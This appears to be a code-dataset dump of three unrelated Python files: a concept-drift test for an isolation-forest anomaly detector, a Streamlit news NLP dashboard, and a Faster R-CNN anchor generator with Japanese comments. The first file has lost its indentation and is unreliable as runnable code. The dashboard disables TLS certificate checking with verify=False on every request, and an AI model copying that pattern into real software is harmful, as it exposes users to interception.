from .anomaly_dataset_support import dataset_configs
"""
pythonw -m ad_examples.aad.test_concept_drift --debug --plot --log_file=temp/test_concept_drift.log --dataset=weather
"""
def get_iforest_model(x):
model = AadForest(n_estimators=100, # 100,
max_samples=256,
score_type=IFOR_SCORE_TYPE_NEG_PATH_LEN, random_state=42,
add_leaf_nodes_only=True,
max_depth=100,
ensemble_score=ENSEMBLE_SCORE_LINEAR,
detector_type=AAD_IFOREST, n_jobs=4,
tree_update_type=TREE_UPD_INCREMENTAL,
feature_partitions=None)
model.fit(x)
model.init_weights(init_type=INIT_UNIF)
return model
def test_kl_data_drift():
logger = logging.getLogger(__name__)
args = get_command_args(debug=False, debug_args=["--debug",
"--plot",
"--log_file=temp/test_concept_drift.log"])
configure_logger(args)
np.random.seed(42)
dataset_config = dataset_configs[args.dataset]
stream_window = dataset_config[2]
alpha = 0.05
X_full, y_full = read_anomaly_dataset(args.dataset)
logger.debug("dataset: %s (%d, %d), stream_window: %d, alpha: %0.3f" %
(args.dataset, X_full.shape[0], X_full.shape[1], stream_window, alpha))
stream = DataStream(X_full, y_full, IdServer(initial=0))
training_set = stream.read_next_from_stream(stream_window)
x, y, ids = training_set.x, training_set.y, training_set.ids
model = get_iforest_model(x)
all_kl_q_alpha = list()
all_reference_kls = list()
all_compare_kls = list()
trees_replaced = list()
# compute KL replacement threshold *without* p
ref_kls, kl_q_alpha = model.get_KL_divergence_distribution(x, p=None, alpha=alpha)
# now initialize reference p
p = model.get_node_sample_distributions(x)
max_kl = np.max(ref_kls)
window = 0 # already read the first window
while True:
buffer = stream.read_next_from_stream(stream_window)
if buffer is None:
break
window += 1
x, y, ids = buffer.x, buffer.y, buffer.ids
# logger.debug("#new: %d" % x.shape[0])
model.add_samples(X=x)
all_kl_q_alpha.append(kl_q_alpha)
all_reference_kls.append(ref_kls)
# compare KL-divergence of current data dist against reference dist p
comp_kls, _ = model.get_KL_divergence_distribution(x, p=p)
all_compare_kls.append(comp_kls)
max_kl = max(max_kl, np.max(comp_kls))
# find which trees exceed alpha-level threshold
replace_trees_by_kl = model.get_trees_to_replace(comp_kls, kl_q_alpha)
n_trees = model.clf.n_estimators
n_replace = 0 if replace_trees_by_kl is None else len(replace_trees_by_kl)
n_threshold = int(2*alpha*n_trees)
# we will replace if 2*alpha number of trees exceed the alpha-threshold
do_replace = n_trees > 0 and n_replace >= n_threshold
logger.debug("window %d: n_replace: %d, threshold num: %d, do_replace: %s" %
(window, n_replace, n_threshold, str(do_replace)))
if do_replace:
if False:
logger.debug("window %d: #replace_trees_by_kl: %d\n%s" %
(window, len(replace_trees_by_kl), str(list(replace_trees_by_kl))))
trees_replaced.append(len(replace_trees_by_kl))
model.update_model_from_stream_buffer(replace_trees=replace_trees_by_kl)
# recompute KL replacement threshold *without* p
ref_kls, kl_q_alpha = model.get_KL_divergence_distribution(x, p=None, alpha=alpha)
max_kl = max(max_kl, np.max(ref_kls))
# now recompute reference p
p = model.get_node_sample_distributions(x)
else:
if False:
logger.debug("window %d: model not updated; replace_trees_by_kl: %s" %
(window, str(list(replace_trees_by_kl)) if replace_trees_by_kl is not None else None))
trees_replaced.append(0)
if args.plot:
legend_datasets = None
# legend_datasets = ['ann_thyroid_1v3', 'weather']
xlim = [0, window+1]
ylim = [0, max_kl+3]
dp = DataPlotter(pdfpath="./temp/test_concept_drift_%s.pdf" % args.dataset,
rows=1, cols=1)
pl = dp.get_next_plot()
plt.xlim(xlim)
plt.ylim(ylim)
plt.xlabel('window', fontsize=18)
plt.ylabel('KL-divergence', fontsize=18)
for i in range(window):
ref_label = com_label = threshold_label = replaced_label = None
ref_kls = all_reference_kls[i]
com_kls = all_compare_kls[i]
mkl = max(np.max(ref_kls), np.max(com_kls))
x_coord = i+1
replaced_y_coord = mkl+2
if i == 0:
ref_label = "ref. KL dist"
com_label = "KL-dist w.r.t ref. dist"
threshold_label = "%0.2f-alpha KL" % alpha
replaced_label = "(.) - number of trees replaced"
pl.scatter([x_coord], [replaced_y_coord], color="black", marker=".", s=0, label=replaced_label)
pl.scatter(np.ones(len(ref_kls), dtype=np.float32)*x_coord, ref_kls,
color="orange", marker="*", s=8, label=ref_label)
pl.scatter([x_coord], [all_kl_q_alpha[i]], color="red", marker="+", s=30, label=threshold_label)
pl.scatter(np.ones(len(ref_kls), dtype=np.float32)*x_coord + 0.1, com_kls,
color="green", marker="*", s=8, label=com_label)
pl.text(x_coord-0.2, replaced_y_coord, "(%d)"%trees_replaced[i], fontsize=10, label=replaced_label)
if legend_datasets is None or args.dataset in legend_datasets:
pl.legend(loc='upper left', prop={'size': 14})
dp.close()
if __name__ == "__main__":
test_kl_data_drift()
|
py | 7df808556a70e755db5058e97fe4c9d3d53b05fd | import streamlit as st
import pandas as pd
import spacy_streamlit
import spacy
from spacy import displacy
import requests
from requests.structures import CaseInsensitiveDict
nlp = spacy.load('en_core_web_sm')
def main():
pages = {
"Article Selection": page_second,
"Dashboard": page_third
}
if "page" not in st.session_state:
st.session_state.update({
# Default page
"page": "Article Selection",
# Default widget values
"int": 0,
"options": ["NER","Summarization","Sentiment", "Tokenize"],
"radio": "NER"
})
with st.sidebar:
page = st.radio("Select your page", tuple(pages.keys()))
pages[page]()
def page_second():
st.header("POLITICS")
DATA_URL="https://storage.googleapis.com/storm_event/CNN/CNN_Politics.csv"
data = st.cache(pd.read_csv)(DATA_URL, nrows=1000)
data_pol = data[['title',"datetime"]]
st.write('### Full Dataset', data_pol)
int_val = st.number_input('Select a row for the article', min_value=0, max_value=49, step=1, key="int")
title = st.header(data["title"][int_val])
audio_backend = f'https://news-analysis-es3uwbxn2a-uc.a.run.app/politics/{int_val}/text-to-speech'
audio = process_tts(audio_backend)
if audio:
st.audio(f'https://storage.googleapis.com/storm_event/CNN_audio/politics/{int_val}.mp3', format='audio/ogg')
author = st.write("Author "+data["author"][int_val])
datetime = st.write(data["datetime"][int_val])
body = st.write(data["body"][int_val])
article_url = st.write(data["url"][int_val])
def page_third():
x=st.session_state.int
st.session_state.int = x
DATA_URL="https://storage.googleapis.com/storm_event/CNN/CNN_Politics.csv"
data = st.cache(pd.read_csv)(DATA_URL)
nlp_option = st.radio("Services", st.session_state["options"], key="radio")
if nlp_option=="NER":
st.write("# NER")
doc=nlp(data["body"][x])
spacy_streamlit.visualize_ner(doc,labels=nlp.get_pipe('ner').labels, show_table=False)
if nlp_option=="Tokenize":
st.write("# Text Tokenization")
doc=nlp(data["body"][x])
spacy_streamlit.visualize_tokens(doc, attrs=["text", "pos_", "dep_", "ent_type_"])
if nlp_option=="Sentiment":
st.write("# Sentiment")
backend = f'https://news-analysis-es3uwbxn2a-uc.a.run.app/politics/{x}/sentiment'
sentiment = process_sentiment(backend)
st.write(sentiment ["Sentiment"])
st.write(sentiment["Subjectivity"])
if nlp_option=="Summarization":
st.write("# Summarization")
backend = f'https://news-analysis-es3uwbxn2a-uc.a.run.app/politics/{x}/summarizer'
summarize = process_summarization(backend)
st.write(summarize)
def process_sentiment(server_url: str):
headers = CaseInsensitiveDict()
headers["accept"] = "application/json"
# headers["Content-Type"] = "application/json"
# valid_text = {
# 'text': input_text
# }
# data = '{"text":'+input_text+'}'
# data = '{"text":"'+text+'"}'
data = ''
resp = requests.post(server_url, headers=headers, data=data, verify=False, timeout=8000)
result = resp.json()
result_dict = result['sentiment']
valid_sentiment = result_dict["Sentiment"]
valid_subjectivity = result_dict["dataframe"]["value"]["1"]
return {"Sentiment":valid_sentiment, "Subjectivity":valid_subjectivity}
def process_tts(server_url: str):
headers = CaseInsensitiveDict()
headers["accept"] = "application/json"
# headers["Content-Type"] = "application/json"
# valid_text = {
# 'text': input_text
# }
# data = '{"text":'+input_text+'}'
# data = '{"text":"'+text+'"}'
data = ''
resp = requests.post(server_url, headers=headers, data=data, verify=False, timeout=8000)
result = resp.json()
valid_result = result['Save']
return True if valid_result=="Successful" else False
def process_summarization(server_url: str):
headers = CaseInsensitiveDict()
headers["accept"] = "application/json"
data = ''
resp = requests.post(server_url, headers=headers, data=data, verify=False, timeout=8000)
result = resp.json()
summ = result["summary"][0]["summary_text"]
return summ
if __name__ == "__main__":
main() |
py | 7df808d1bee93d3d0339151f75ded330eb70722f | import numpy as np
from xrcnn.util import bbox as B
class Anchor:
def __init__(self, config):
# def __init__(self, base_size=16,
# anchor_ratios=[
# (1. / math.sqrt(2), 2. / math.sqrt(2)),
# (1., 1.),
# (2. / math.sqrt(2), 1. / math.sqrt(2))],
# anchor_scales=[128 / 4, 256 / 4, 512 / 4],
# backbone_shape=[64 / 4, 64 / 4]):
"""RoI予測の基準となるアンカーを生成する。
アンカーの基準となる値を指定する。
Args:
base_size (number): アンカーを適用する特徴マップ1ピクセルが、入力画像において何ピクセルに値するか。
anchor_ratios (list of float): アンカーのアスペクト比。
:math:`[(h, w), ...]`
anchor_scales (list of numbers): アンカーのサイズ(入力画像におけるサイズ)。
このサイズの正方形をアンカーの領域とする。
anchor_ratios (list of numbers): アンカーのアスペクト比
"""
self.base_size = config.stride_per_base_nn_feature
self.backbone_shape = config.backbone_shape
self.anchor_ratios = config.anchor_box_aspect_ratios
self.anchor_scales = config.anchor_box_scales
self.bbox_refinement_std = config.bbox_refinement_std
self.anchor_base = self._anchor_base(
self.base_size, self.anchor_ratios, self.anchor_scales)
self.anchors = self._generate_anchors(self.backbone_shape)
def generate_gt_offsets(self, bbox_gt, img_size,
pos_iou_thresh=0.5,
neg_iou_thresh=0.3,
n_max_sample=256,
pos_ratio=0.5):
"""anchorにGroud truthなBBoxを適用し、anchor毎に最もIoUが大きいBBoxを特定し、そのBBoxとのオフセットを得る。
IoU値により、各アンカーを以下に分類する。
0.7以上:オブジェクト
→0.5にする。
0.7だとVOCdevkit/VOC2007/Annotations/007325.xmlにあるようなサイズのBboxが
GTとして得られなかったため。
0.3未満:非オブジェクト
それ以外:評価対象外。つまり、トレーニングには使わないアンカー。
Args:
bbox_gt (array): Ground truthなBBox
Its shape is :math:`(R, 4)`.
img_size (h,w): 入力画像の高さと幅のタプル.
pos_iou_thresh: この値以上のIoUをclass=1とする。
pos_iou_thresh: この値未満のIoUをclass=0とする。
n_max_sample: 評価対象とする(classが1or0である)オフセットの上限
pos_ratio: 評価対象サンプル中のPositiveの割合
n_max_sample, pos_ratioは論文中の以下への対応。
考慮無しではNegativeサンプルが支配的になる。学習効率も考慮し、このような処理を行うものと思われる。
Each mini-batch arises from a single image that contains many
positive and negative example anchors. It is possible to
optimize for the loss functions of all anchors,
but this will bias towards negative samples as they are
dominate. Instead, we randomly sample 256 anchors in an image
to compute the loss function of a mini-batch, where the sampled
positive and negative anchors have a ratio of up to 1:1.
If there are fewer than 128 positive samples in an image,
we pad the mini-batch with negative ones.
Returns:
(offsets, obj_flags):
offsets (array) : 各アンカーとGround TruthなBBoxとのオフセット。
Its shape is :math:`(S, 4)`.
2軸目の内容は以下の通り。
(x, y ,h, w)
objects (array): 各アンカーがオブジェクトか否か。
Its shape is :math:`(S, 1)`.
2軸目の内容は以下の通り。
1:オブジェクト
0:非オブジェクト
−1:評価対象外
"""
h, w = img_size
anchor = self.anchors
n_anchor_initial = len(anchor)
# 入力領域をはみ出すアンカーを除外
index_inside = np.where(
(anchor[:, 0] >= 0) &
(anchor[:, 1] >= 0) &
(anchor[:, 2] <= h) &
(anchor[:, 3] <= w)
)[0]
anchor = anchor[index_inside]
# 各アンカー毎にGTとのIoUを算出し、最大か0.7以上のIoUを残す。
# IoU >= 0.7はオブジェクト候補とする(class = 1)
# IoU < 0.3は非オブジェクト候補とする(class = 0)
# それ以外のIoUは評価対象外とする(class = -1)
argmax_ious, objects = self._create_label(anchor, bbox_gt,
pos_iou_thresh,
neg_iou_thresh,
n_max_sample,
pos_ratio)
# アンカーとGroud truthのオフセットを得る。
offsets = B.get_offset(anchor, bbox_gt[argmax_ious])
# 既存実装に合わせた精度向上
offsets /= np.array(self.bbox_refinement_std)
# 元の形状に戻す。
# index_insideに削減した1次元目の次元数をn_anchor_initialに戻す。
# 復元した座標は評価対象外なので、ラベルは−1、オフセットは0を設定して無効な状態に。
objects = self._unmap(objects, n_anchor_initial, index_inside, fill=-1)
offsets = self._unmap(offsets, n_anchor_initial, index_inside, fill=0)
return offsets, objects
def _create_label(self, anchor, bbox, pos_iou_thresh, neg_iou_thresh,
n_max_sample, pos_ratio):
"""
anchorとbboxのIoUを算出し、それぞれオブジェクト候補か否かを得る。
IoU >= 0.7はオブジェクト候補とする(class = 1)
IoU < 0.3は非オブジェクト候補とする(class = 0)
それ以外のIoUは評価対象外とする(class = -1)
anchor毎に全bboxについてのIoUを算出する。
つまり、(len(anchor), len(bbox))のマトリクスになる。
このマトリクスから、anchor毎に最大のIoUを含むbboxのindexを得る。
Args:
anchor (tensor): アンカー
Its shape is :math:`(R, 4)`.
bbox (tensor): Ground truthなBBox
Its shape is :math:`(S, 4)`.
pos_iou_thresh: この値以上のIoUをclass=1とする。
pos_iou_thresh: この値未満のIoUをclass=0とする。
n_max_sample: 評価対象とする(classが1or0である)オフセットの上限
pos_ratio: 評価対象サンプル中のPositiveの割合
Returns:
(index_max_iou_per_anchor, label)
index_max_iou_per_anchor: anchor毎のIoUが最大となるbboxのIndex。
Its shape is :math:`(R, 1)`.
label:anchor毎のオブジェクト/非オブジェクト
Its shape is :math:`(R, 1)`.
"""
# 評価対象外の−1で初期化
label = np.full((len(anchor)), -1)
# アンカー毎にIoUが最大となるbboxの列Indexとその値、最大のIoUを含むアンカーのIndexを得る。
index_max_iou_per_anchor, max_ious, gt_argmax_ious = self._calc_ious(
anchor, bbox)
# 最大のIoUを含むアンカーはPositive
label[gt_argmax_ious] = 1
# 閾値以上のIoUはPositive
label[max_ious >= pos_iou_thresh] = 1
# 閾値未満のIoUはNegative
label[max_ious < neg_iou_thresh] = 0
# Positiveのサンプル数を上限以内に抑える
n_pos_max = int(pos_ratio * n_max_sample)
pos_index = np.where(label == 1)[0]
if len(pos_index) > n_pos_max:
# n_pos_maxを超える場合は、Positiveをランダムに評価対象外にする
disable_index = np.random.choice(
pos_index, size=(len(pos_index) - n_pos_max), replace=False)
label[disable_index] = -1
# Negativeサンプルも同様に上限以内に抑える
n_neg = n_max_sample - np.sum(label == 1)
neg_index = np.where(label == 0)[0]
if len(neg_index) > n_neg:
disable_index = np.random.choice(
neg_index, size=(len(neg_index) - n_neg), replace=False)
label[disable_index] = -1
return index_max_iou_per_anchor, label
def _calc_ious(self, anchor, bbox):
# anchor毎に全bboxとのIoUを得る。
ious = B.get_iou(anchor, bbox)
# anchor毎に最大のIoUが格納されている列Indexを得る。
argmax_ious = ious.argmax(axis=1)
# argmax_iousが示すIndexの実数、つまりアンカー毎の最大のIoUを得る。
max_ious = ious[np.arange(ious.shape[0]), argmax_ious]
# IoUが最大となるアンカーのIndexを特定する
# 以下はchainercvに於ける実装だが、これだと全てのBBoxとのIoUが0の
# アンカーについてもgt_argmax_iousに含まれそう。。。つまり全てPositive扱いになる。
# 論文に従い、最大IoUのアンカーのみを特定する。
# gt_argmax_ious = ious.argmax(axis=0)
# gt_max_ious = ious[gt_argmax_ious, np.arange(ious.shape[1])]
# gt_argmax_ious = np.where(ious == gt_max_ious)[0]
gt_argmax_ious = np.where(ious == ious.max())[0]
return argmax_ious, max_ious, gt_argmax_ious
def _unmap(self, data, count, index, fill=0):
# 元の形状に戻す。
if len(data.shape) == 1:
ret = np.empty((count,), dtype=data.dtype)
ret.fill(fill)
ret[index] = data
else:
ret = np.empty((count,) + data.shape[1:], dtype=data.dtype)
ret.fill(fill)
ret[index, :] = data
return ret
def _generate_anchors(self, feature_shape):
"""特徴マップの各ピクセル毎のアンカーを生成する。
Args:
feature_shape: 特徴マップの高さと幅のタプル
(h, w)
Returns:
ndarray
形状は以下の通り。
(len(feature_height) * len(feature_width)
* len(self.anchor_ratios) * len(self.anchor_scales), 4)
1軸目は「特徴マップの行」→「特徴マップの列」→「アスペクト比の順」→「アンカーサイズ」で並ぶ。
例:
2軸目に格納される座標の形状は以下の通り。
: math: `(y_{min}, x_{min}, y_{max}, x_{max})`
"""
feature_height, feature_width = feature_shape
# フィーチャマップの全ピクセルを示す交点座標
shift_y = np.arange(0, feature_height * self.base_size, self.base_size)
shift_x = np.arange(0, feature_width * self.base_size, self.base_size)
shift_x, shift_y = np.meshgrid(shift_x, shift_y)
# 交点毎にself._anchor_baseを加算することで交点毎のアンカーを算出したい。
# 各交点のアンカーのベースとなる座標を求める
shift = np.stack((shift_y.flatten(), shift_x.flatten(),
shift_y.flatten(), shift_x.flatten()), axis=1)
# np.arange(0, 5, 1)で以下のようになる。
# >>> shift_y
# array([[0, 0, 0, 0, 0],
# [1, 1, 1, 1, 1],
# [2, 2, 2, 2, 2],
# [3, 3, 3, 3, 3],
# [4, 4, 4, 4, 4]])
# >>> shift_x
# array([[0, 1, 2, 3, 4],
# [0, 1, 2, 3, 4],
# [0, 1, 2, 3, 4],
# [0, 1, 2, 3, 4],
# [0, 1, 2, 3, 4]])
# >>> shift
# array([[0, 0, 0, 0],
# [0, 1, 0, 1],
# [0, 2, 0, 2],
# [0, 3, 0, 3],
# [0, 4, 0, 4],
# [1, 0, 1, 0],
# [1, 1, 1, 1],
# [1, 2, 1, 2],
# [1, 3, 1, 3],
# [1, 4, 1, 4],
# [2, 0, 2, 0],
# [2, 1, 2, 1],
# [2, 2, 2, 2],
# [2, 3, 2, 3],
# [2, 4, 2, 4],
# [3, 0, 3, 0],
# [3, 1, 3, 1],
# [3, 2, 3, 2],
# [3, 3, 3, 3],
# [3, 4, 3, 4],
# [4, 0, 4, 0],
# [4, 1, 4, 1],
# [4, 2, 4, 2],
# [4, 3, 4, 3],
# [4, 4, 4, 4]])
n_a = self.anchor_base.shape[0]
n_s = shift.shape[0]
# 各交点毎にアンカーの座標を求める。
# まずはそのために次元を調整。
# (len(feature_height) * len(feature_width), 1, 4)にする。
# 上記5*5の例であれば、(25,1,4)
shift = np.transpose(np.reshape(shift, (1, n_s, 4)), (1, 0, 2))
# (1, len(self.anchor_ratios) * len(self.anchor_scales), 4)にする。
# 上記5*5の例であれば、(1,9,4)
anchor = np.reshape(self.anchor_base, (1, n_a, 4))
# shift + anchorにより、shift[n, :, :]とanchor[:, k, :]の組合せが得られる。
# つまり、各交点毎にanchor_baseを加算した結果が得られる。
# 結果として得られるテンソルの形状は以下の通り。
# (len(feature_height) * len(feature_width),
# len(self.anchor_ratios) * len(self.anchor_scales), 4)
# 上記5*5の例であれば、(25,9,4)
anchor = shift.astype(float) + anchor
# 上記を以下の形状に変換する。
# (len(feature_height) * len(feature_width)
# * len(self.anchor_ratios) * len(self.anchor_scales), 4)
anchor = np.reshape(anchor, (n_s * n_a, 4))
return anchor.astype('float32')
def _anchor_base(self, base_size, anchor_ratios, anchor_scales):
"""基準となるアンカーを生成する。
ratiosとanchor_scales毎にアンカーを示す座標(矩形の左上と右下の座標)を返す。
矩形の中心は(base_size / 2, base_size / 2)とする。(論文に合わせ、受容野の中心とする)
Args:
base_size(number): アンカーを適用する特徴マップ1ピクセルが、入力画像において何ピクセルに値するか。
anchor_ratios(list of float): アンカーのアスペクト比。
: math: `[(h, w), ...]`
anchor_scales(list of numbers): アンカーのサイズ(入力画像におけるサイズ)。
このサイズの正方形をアンカーの領域とする。
Returns:
numpy配列
形状は以下の通り。
(len(anchor_ratios) * len(anchor_scales), 4)
2軸目に格納される座標の形状は以下の通り。
: math: `(y_{min}, x_{min}, y_{max}, x_{max})`
"""
# 受容野の中心を指定
py = base_size / 2.
px = base_size / 2.
anchor_base = np.zeros((len(anchor_ratios) * len(anchor_scales), 4),
dtype=np.float32)
for i in range(len(anchor_ratios)):
for j in range(len(anchor_scales)):
h = anchor_scales[j] * anchor_ratios[i][0]
w = anchor_scales[j] * anchor_ratios[i][1]
index = i * len(anchor_scales) + j
# 矩形右上の座標
anchor_base[index, 0] = py - h / 2.
anchor_base[index, 1] = px - w / 2.
# 矩形左上の座標
anchor_base[index, 2] = py + h / 2.
anchor_base[index, 3] = px + w / 2.
return anchor_base.astype('float32')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.